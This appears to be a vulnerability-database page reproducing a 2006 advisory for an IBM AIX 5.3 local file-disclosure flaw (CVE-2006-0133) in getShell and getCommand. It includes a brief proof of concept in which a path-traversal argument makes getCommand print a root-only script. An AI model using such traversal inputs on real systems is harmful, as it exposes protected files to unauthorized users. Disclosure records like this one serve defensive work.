Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2006-0133

Publish Date: 01 Jan 2006

Author: xfocus

                source: http://www.securityfocus.com/bid/16103/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer. 

-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh

ps -ef &gt; /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure

Vulmon Search

About

Products

Connect